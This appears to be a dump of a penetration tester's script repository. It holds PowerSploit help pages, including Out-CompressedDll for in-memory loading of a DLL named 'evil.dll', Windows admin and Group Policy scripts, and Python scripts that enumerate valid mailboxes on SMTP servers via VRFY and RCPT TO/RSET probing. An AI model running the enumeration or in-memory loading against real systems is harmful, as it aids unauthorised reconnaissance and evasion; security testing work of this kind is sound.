Default value: False 85 | Accept pipeline input: False 86 | Accept wildcard characters: False 87 | ``` 88 | 89 | ## INPUTS 90 | 91 | ## OUTPUTS 92 | 93 | ### IntPtr 94 | 95 | The TokenHandle result from LogonUser. Pass it to Invoke-RevertToSelf -TokenHandle so the handle is closed when impersonation is reverted. 96 | 97 | ## NOTES 98 | 99 | ## RELATED LINKS 100 | 101 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Remove-RemoteConnection.md: -------------------------------------------------------------------------------- 1 | # Remove-RemoteConnection 2 | 3 | ## SYNOPSIS 4 | Destroys a connection created by Add-RemoteConnection. 
5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: PSReflect 9 | 10 | ## SYNTAX 11 | 12 | ### ComputerName (Default) 13 | ``` 14 | Remove-RemoteConnection [-ComputerName] 15 | ``` 16 | 17 | ### Path 18 | ``` 19 | Remove-RemoteConnection [-Path] 20 | ``` 21 | 22 | ## DESCRIPTION 23 | This function uses WNetCancelConnection2 to destroy a connection created by 24 | Add-RemoteConnection. 25 | If a -Path isn't specified, a -ComputerName is required to 26 | 'unmount' \\\\$ComputerName\IPC$. 27 | 28 | ## EXAMPLES 29 | 30 | ### -------------------------- EXAMPLE 1 -------------------------- 31 | ``` 32 | Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local' 33 | ``` 34 | Cancels the \\\\PRIMARY.testlab.local\IPC$ connection. 35 | ### -------------------------- EXAMPLE 2 -------------------------- 36 | ``` 37 | Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' 38 | ``` 39 | Cancels the connection to the given UNC path. 40 | ### -------------------------- EXAMPLE 3 -------------------------- 41 | ``` 42 | @('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection 43 | ``` 44 | Cancels the IPC$ connection for each computer name read from the pipeline. 45 | ## PARAMETERS 46 | 47 | ### -ComputerName 48 | Specifies the system to remove a \\\\ComputerName\IPC$ connection for. 49 | 50 | ```yaml 51 | Type: String[] 52 | Parameter Sets: ComputerName 53 | Aliases: HostName, dnshostname, name 54 | 55 | Required: True 56 | Position: 1 57 | Default value: None 58 | Accept pipeline input: True (ByPropertyName, ByValue) 59 | Accept wildcard characters: False 60 | ``` 61 | 62 | ### -Path 63 | Specifies the remote \\\\UNC\path to remove the connection for. 
64 | 65 | ```yaml 66 | Type: String[] 67 | Parameter Sets: Path 68 | Aliases: 69 | 70 | Required: True 71 | Position: 1 72 | Default value: None 73 | Accept pipeline input: False 74 | Accept wildcard characters: False 75 | ``` 76 | 77 | ## INPUTS 78 | 79 | ## OUTPUTS 80 | 81 | ## NOTES 82 | 83 | ## RELATED LINKS 84 | 85 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/Recon/Resolve-IPAddress.md: -------------------------------------------------------------------------------- 1 | # Resolve-IPAddress 2 | 3 | ## SYNOPSIS 4 | Resolves a given hostname to its associated IPv4 address. 5 | 6 | Author: Will Schroeder (@harmj0y) 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | 10 | ## SYNTAX 11 | 12 | ``` 13 | Resolve-IPAddress [[-ComputerName] ] 14 | ``` 15 | 16 | ## DESCRIPTION 17 | Resolves a given hostname to its associated IPv4 address using 18 | \[Net.Dns\]::GetHostEntry(). 19 | If no hostname is provided, the default 20 | is the IP address of the local host. 21 | 22 | ## EXAMPLES 23 | 24 | ### -------------------------- EXAMPLE 1 -------------------------- 25 | ``` 26 | Resolve-IPAddress -ComputerName SERVER 27 | ``` 28 | 29 | ### -------------------------- EXAMPLE 2 -------------------------- 30 | ``` 31 | @("SERVER1", "SERVER2") | Resolve-IPAddress 32 | ``` 33 | 34 | ## PARAMETERS 35 | 36 | ### -ComputerName 37 | Specifies one or more hostnames to resolve (NetBIOS name or FQDN). Defaults to the local computer name. 38 | 39 | ```yaml 40 | Type: String[] 41 | Parameter Sets: (All) 42 | Aliases: HostName, dnshostname, name 43 | 44 | Required: False 45 | Position: 1 46 | Default value: $Env:COMPUTERNAME 47 | Accept pipeline input: True (ByPropertyName, ByValue) 48 | Accept wildcard characters: False 49 | ``` 50 | 51 | ## INPUTS 52 | 53 | ### String 54 | 55 | Accepts one or more hostname strings on the pipeline. 56 | 57 | ## OUTPUTS 58 | 59 | ### System.Management.Automation.PSCustomObject 60 | 61 | A custom PSObject with the ComputerName and IPAddress. 
62 | 63 | ## NOTES 64 | 65 | ## RELATED LINKS 66 | 67 | -------------------------------------------------------------------------------- /powershell/PowerSploit/docs/ScriptModification/Out-CompressedDll.md: -------------------------------------------------------------------------------- 1 | # Out-CompressedDll 2 | 3 | ## SYNOPSIS 4 | Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. 5 | 6 | PowerSploit Function: Out-CompressedDll 7 | Author: Matthew Graeber (@mattifestation) 8 | License: BSD 3-Clause 9 | Required Dependencies: None 10 | Optional Dependencies: None 11 | 12 | ## SYNTAX 13 | 14 | ``` 15 | Out-CompressedDll [-FilePath] 16 | ``` 17 | 18 | ## DESCRIPTION 19 | Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. 20 | 21 | ## EXAMPLES 22 | 23 | ### -------------------------- EXAMPLE 1 -------------------------- 24 | ``` 25 | Out-CompressedDll -FilePath evil.dll 26 | ``` 27 | 28 | Description 29 | ----------- 30 | Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. 31 | 32 | ## PARAMETERS 33 | 34 | ### -FilePath 35 | Specifies the path to a managed executable. 36 | 37 | ```yaml 38 | Type: String 39 | Parameter Sets: (All) 40 | Aliases: 41 | 42 | Required: True 43 | Position: 1 44 | Default value: None 45 | Accept pipeline input: False 46 | Accept wildcard characters: False 47 | ``` 48 | 49 | ## INPUTS 50 | 51 | ## OUTPUTS 52 | 53 | ## NOTES 54 | Only pure MSIL-based dlls can be loaded using this technique. 55 | Native or IJW ('it just works' - mixed-mode) dlls will not load. 
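## RELATED LINKS

[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)

# -------------------------------------------------------------------------------- /powershell/adwcleaner.ps1:
# --------------------------------------------------------------------------------
<#
.SYNOPSIS
Run AdwCleaner scan.
.DESCRIPTION
Downloads the current release of AdwCleaner into the working directory, refuses to
run it unless it carries a valid Authenticode signature from the download vendor,
runs an elevated clean scan (/eula /clean /noreboot) and prints every log file the
run produced.
.PARAMETER workingDir
The working directory where the AdwCleaner.exe will be downloaded and run.
.EXAMPLE
.\adwcleaner.ps1 -workingDir "C:\custom\path\"
.AUTHOR
Matthew C. Jones, CPA, CISA, OSCP, CCFE
Symphona, LLP
.CHANGELOG
1/9/2023 - Initial release.
#>

param(
    [string]$workingDir = "C:\temp\"
)

$downloadUrl = "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release"
# Join-Path avoids the doubled separator that "$workingDir\..." produces when the
# directory already ends in a backslash (the default does).
$savePath = Join-Path $workingDir "AdwCleaner.exe"
$logPath = Join-Path $workingDir "Adwcleaner\Logs"
# Quote the directory handed to /path so a working directory containing spaces is
# not split into several switches. The trailing backslash is trimmed first: a
# backslash immediately before a closing quote is treated as an escape by the
# Windows command-line parser and would swallow the quote.
$pathArg = $workingDir.TrimEnd('\')
$switches = "/eula /clean /noreboot /path `"$pathArg`""
# Publisher expected in the Authenticode signer subject; derived from the download host.
$expectedPublisher = 'Malwarebytes'

# Create the directory if it doesn't exist
$null = New-Item -ItemType Directory -Force -Path $workingDir

# Download the file. -ErrorAction Stop so a failed download cannot fall through to
# executing whatever stale AdwCleaner.exe may already be sitting in $workingDir.
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -ErrorAction Stop

# The binary is about to run elevated (-Verb RunAs): verify its signature before
# executing anything that came off the network.
$signature = Get-AuthenticodeSignature -FilePath $savePath
if ($signature.Status -ne 'Valid' -or $signature.SignerCertificate.Subject -notmatch $expectedPublisher) {
    throw "Refusing to run $savePath - signature status '$($signature.Status)', signer '$($signature.SignerCertificate.Subject)'"
}

# Store the start time of the script
$startTime = Get-Date

# Run the file
Start-Process -FilePath $savePath -ArgumentList $switches -Verb RunAs -Wait

# Get all files in the logs directory that have been modified since the start time of the script.
# SilentlyContinue: if AdwCleaner wrote no logs the directory may not exist, and that is
# reported as "no output" rather than as an error.
$logFiles = Get-ChildItem -Path $logPath -File -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt $startTime } |
    Sort-Object LastWriteTime

# Read the contents of the files into the $content variable
$content = $logFiles | ForEach-Object {
    "`n$($_.FullName)`n"
    Get-Content -LiteralPath $_.FullName
}

# Output the content to the CLI
Write-Output $content
# -------------------------------------------------------------------------------- /powershell/export_AD_groups.ps1:
# --------------------------------------------------------------------------------
#Designed to export information in same format as DumpSec

# yyyyMMdd-HHmmss: upper-case 'MM' is the month; the lower-case 'mm' in the previous
# pattern ('ssddmmyyyy') was minutes, so the date stamp was wrong.
$reportdate = Get-Date -Format yyyyMMdd-HHmmss

#$csvreportfile = "ALLADGroups_$reportdate.csv"
$csvreportfile = "AD_group_membership.csv"

#import the ActiveDirectory Module
Import-Module ActiveDirectory

# Only Description has to be requested explicitly; GroupCategory/GroupScope are default
# properties. '-Properties *' pulled every attribute of every group for nothing.
$ADGroups = Get-ADGroup -Filter '*' -Properties Description |
    Where-Object { $_.GroupCategory -eq "Security" } |
    Sort-Object SamAccountName

$Results = ForEach ($AdGroup in $ADGroups)
{
    try {
        # Recursive expansion can fail for individual groups; report which one and
        # carry on rather than silently emitting no rows for it.
        $Members = Get-ADGroupMember -Identity $AdGroup.SamAccountName -Recursive -ErrorAction Stop |
            Where-Object { $_.ObjectClass -ne "computer" }
    }
    catch {
        Write-Warning "Could not enumerate members of $($AdGroup.SamAccountName): $_"
        continue
    }
    ForEach ($Member in $Members)
    {
        $Hash = @{
            Group = $AdGroup.SamAccountName
            Description = $AdGroup.Description
            GroupType = $AdGroup.GroupScope
            Member = $Member.SamAccountName
            MemberType = $Member.objectClass
        }
        New-Object -TypeName PSObject -Property $Hash
    }
}

$Results | Select-Object Group,Description,GroupType,Member,MemberType | Export-Csv -Path $csvreportfile -NoTypeInformation
# -------------------------------------------------------------------------------- /powershell/export_all_GPO_reports.ps1:
# --------------------------------------------------------------------------------
#Exports all group policy objects as individual GPO reports

Import-Module GroupPolicy
Get-GPO -All | ForEach-Object {
    # GPO display names may contain characters that are illegal in file names
    # (e.g. '/' or ':'); substitute them so one such GPO does not abort the export.
    $safeName = $_.DisplayName -replace '[\\/:*?"<>|]', '_'
    Get-GPOReport -Guid $_.Id -ReportType HTML -Path "GPO_$safeName.html"
}
Get-GPOReport -All -ReportType html -Path GPO_all.html
Get-GPOReport -All -ReportType xml -Path GPO_all.xml
# -------------------------------------------------------------------------------- /powershell/gpresult.ps1: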
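# --------------------------------------------------------------------------------
# Runs GPResult (resultant set of policy) for the current machine/user and, on
# request, for any number of additional computer/user pairs entered interactively.
# One HTML report is written per run.
Import-Module -Name grouppolicy

function get_more
{
    # Asks whether another computer/user pair should be queued.
    # Returns $true only when the operator picks "Yes"; "No" (index 1) is the default.
    $title = "Add more"
    $message = "Add GPResult command for alternate computer / user?"

    $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", `
        "Adds another."

    $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", `
        "Runs the commands."

    $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no)

    $result = $host.ui.PromptForChoice($title, $message, $options, 1)

    return ($result -eq 0)
}

function get_params
{
    # Prompts for one target computer and the user context to analyze on it.
    # Read-Host appends ": " to the prompt itself, so the prompts carry no trailing colon.
    $return = "" | Select-Object -Property run_name,target_computer,user_name

    #$return.run_name = Read-Host -Prompt 'Enter the name to be assigned for the run (e.g. DomainController, MemberServer, etc)'
    $return.target_computer = Read-Host -Prompt "Enter the machine name / IP to analyze"
    $return.user_name = Read-Host -Prompt "Enter the user context to analyze (must have profile on target machine)"
    return $return
}

$params = @()

"Running GPResult on the current machine using the current user"
# Same naming scheme, including the .html extension, as the per-target reports below;
# the local report previously had no extension although it is an HTML report.
$path = "gpresult_" + $env:computername + ".html"

Get-GPResultantSetOfPolicy -ReportType html -Path $path

While (get_more)
{
    $params += get_params
}

ForEach ($command in $params)
{
    #$path = 'gpresult_'+$command.run_name + '.html'
    $path = 'gpresult_' + $command.target_computer + '.html'
    "Running GPResult on " + $command.target_computer + " as " + $command.user_name
    Get-GPResultantSetOfPolicy -ReportType html -Path $path -Computer $command.target_computer -User $command.user_name
}
# -------------------------------------------------------------------------------- /smtp_rst.py: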
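# --------------------------------------------------------------------------------
#!/usr/bin/python
"""Enumerate valid mail recipients with MAIL FROM / RCPT TO / RSET.

For every candidate in the user file an envelope is opened with MAIL FROM,
the candidate is offered as RCPT TO, and the transaction is aborted with
RSET before any message body is sent.  A 250 reply to RCPT TO means the
server accepts that recipient, so the candidate is recorded in the output
file.

Usage: smtp_rst <server> <userfile> <outputfile.txt>
"""

import smtplib
import socket
import sys

# Envelope sender used for every probe; it never has to receive anything.
PROBE_SENDER = 'testuser@nomail.com'
# SMTP reply code "requested mail action okay" (recipient accepted).
SMTP_OK = 250
# Seconds to wait on the server; keeps a silent or tarpitting host from
# hanging the scan indefinitely.
SMTP_TIMEOUT = 30


def usage():
    """Print the usage banner and exit without probing anything."""
    sys.stderr.write("Enumerates email accounts by initiating an email and resetting before being sent\n")
    sys.stderr.write("Usage: smtp_rst <server> <userfile> <outputfile.txt>\n")
    sys.exit(0)


def reply_text(code, msg):
    """Render an smtplib (code, msg) reply as one printable line.

    smtplib hands back the reply text as bytes on Python 3 and str on
    Python 2; both are normalised to text here.
    """
    if isinstance(msg, bytes):
        msg = msg.decode('utf-8', 'replace')
    return '%d %s' % (code, msg)


def probe_user(conn, user):
    """Offer *user* as RCPT TO on the open smtplib.SMTP connection *conn*.

    Returns (accepted, reply): accepted is True when the server answered
    RCPT TO with 250.  The envelope is always cleared with RSET afterwards,
    so no message is queued and the next probe starts from a clean state.

    smtplib terminates every command with CRLF and consumes each reply.
    The previous raw-socket version sent EHLO and RSET without CRLF (so
    they were glued onto the next command on the wire) and never read the
    EHLO reply, which left the replies it printed one step behind the
    commands they belonged to.
    """
    conn.mail(PROBE_SENDER)
    code, msg = conn.rcpt(user)
    conn.rset()
    return code == SMTP_OK, reply_text(code, msg)


def read_users(path):
    """Yield the non-empty, whitespace-stripped candidate names in *path*."""
    with open(path) as handle:
        for line in handle:
            line = line.strip()
            if line:
                yield line


def main(argv):
    """Connect, probe every candidate, append the accepted ones to the output file."""
    if len(argv) != 4:
        usage()
    server, userfile, outputfile = argv[1], argv[2], argv[3]

    try:
        # smtplib.SMTP() connects and reads the greeting banner itself.
        conn = smtplib.SMTP(server, 25, timeout=SMTP_TIMEOUT)
    except (socket.error, smtplib.SMTPException) as err:
        sys.stderr.write('Could not connect to %s: %s\n' % (server, err))
        sys.exit(1)

    with open(outputfile, 'a') as out:
        # '\n' rather than the bare '\r' the old version wrote, which showed
        # the whole file as one line on Unix.
        out.write('Output ' + server + ':\n')
        try:
            conn.ehlo_or_helo_if_needed()
            print("Beginning check... \n")
            for user in read_users(userfile):
                print('Checking for user ' + user)
                accepted, reply = probe_user(conn, user)
                print(reply)
                if accepted:
                    # Record the candidate next to the reply: a 250 reply
                    # does not necessarily echo the address back.
                    out.write(user + ' ' + reply + '\n')
        except (socket.error, smtplib.SMTPException) as err:
            sys.stderr.write('SMTP session aborted: %s\n' % err)
        finally:
            # QUIT politely; if the session is already dead just drop the socket.
            try:
                conn.quit()
            except (socket.error, smtplib.SMTPException):
                conn.close()


if __name__ == '__main__':
    main(sys.argv)
# -------------------------------------------------------------------------------- /smtp_vrfy.py:
# --------------------------------------------------------------------------------
#!/usr/bin/python

import socket
import sys

if len(sys.argv) != 4:
    # <server> <userfile> <outputfile> mirror the argv slots read below.
    print("Usage: smtp_vrfy <server> <userfile> <outputfile.txt>")
    sys.exit(0)

# Define input variables
server=sys.argv[1]
userfile=sys.argv[2]
outputfile=sys.argv[3]

#Create a socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Connect to the server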
connect=s.connect((server,25))  # plaintext SMTP on port 25; connect() returns None, so `connect` is never used
20 |
21 | # Receive the banner
22 | banner=s.recv(1024)
23 | print banner
24 |
25 | # Open output file for writing
26 | out=open(outputfile, "a")  # appended to, never truncated
27 | out.write('Active email accounts on server ' + server + ': \r')
28 |
29 | # VRFY users in input file
# Mitigation note: mail servers commonly disable VRFY or answer 252 for every address;
# either way the 250 check on line 40 never matches and nothing is recorded. Each VRFY
# typically appears in the MTA's log, which is where this activity is visible to defenders.
30 | f=open(userfile)
31 | line=f.readline()
32 | print "Beginning check... \n"
33 | while line:
34 | line=line.strip()
35 | print 'Checking for user ' + line
36 | s.send('VRFY ' + line + '\r\n')  # one VRFY per line of the user file
37 | result=s.recv(1024)
38 | print result
39 |
40 | if result.startswith('250'):  # only a 250 reply is treated as a hit
41 | out.write(result + '\r')  # records are separated by '\r' only
42 | result=""
43 | line=f.readline()
44 |
45 | # Cleanup
46 | s.close()  # connection is closed without sending QUIT (smtp_rst.py does send it)
47 | f.close()
48 | out.close()
49 |
50 |
-------------------------------------------------------------------------------- /update_docker_images.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Updates all docker images on filesystem and deletes old images
3 |
4 | #docker images | grep -v REPOSITORY | awk '{print $1}' | xargs -L1 docker pull
# NOTE(review): dangling images print as "<none>:<none>", which "docker pull" cannot resolve;
# xargs -L1 continues past those failures. Every pull re-resolves a mutable tag with no digest
# pinning and no signature check (DOCKER_CONTENT_TRUST is not set), so whatever the registry
# currently serves for that tag is accepted.
5 | docker images --format "{{.Repository}}:{{.Tag}}" | xargs -L1 docker pull
6 | docker image prune -f  # -f: removes dangling images without a confirmation prompt
-------------------------------------------------------------------------------- /update_git_repos.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # Update all git repositories under a base directory
3 | # script courtesy of https://gist.github.com/douglas/1287372
4 |
5 | # store the current dir
6 | CUR_DIR="$(pwd)"  # captured once; each iteration returns here (line 24)
7 |
8 | # Let the person running the script know what's going on.
9 | echo -e "\n\033[1mPulling in latest changes for all repositories...\033[0m\n"
10 |
11 | # Find all git repositories and update it to the master latest revision
# Word-splitting of $(...) breaks on paths containing whitespace; "cut -c 3-" only strips the leading "./".
12 | for i in $(find .
-name ".git" | cut -c 3-); do
13 | echo "";
14 | echo -e "\033[33m"+$i+"\033[0m";  # the '+' characters are printed literally; $i is unquoted
15 |
16 | # We have to go to the .git parent directory to call the pull command
# Neither cd is checked and there is no "set -e": if "cd "$i"" fails, "cd .." still runs
# and the pull on line 21 happens in the parent of the current directory instead.
17 | cd "$i";
18 | cd ..;
19 |
20 | # finally pull
21 | git pull origin master;  # merges whatever the remote currently holds: no commit/tag signature verification, branch hard-coded to master
22 |
23 | # lets get back to the CUR_DIR
24 | cd $CUR_DIR  # unquoted: breaks if the starting directory contains whitespace
25 | done
26 |
27 | echo -e "\n\033[32mComplete!\033[0m\n"
-------------------------------------------------------------------------------- /upgrade_pip_packages.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
# Upgrades every locally installed, non-editable package (grep -v '^\-e' skips editable installs)
# to the newest release the index serves. Nothing is pinned and --require-hashes is not used, so
# one run can replace the whole environment with untested or newly published releases.
# pip2 targets Python 2.
2 |
3 | pip2 freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip2 install -U  # cut -d = -f 1 turns "name==version" into "name"
4 | pip3 freeze --local | grep -v '^\-e' | cut -d = -f 1 | xargs -n1 pip3 install -U
--------------------------------------------------------------------------------
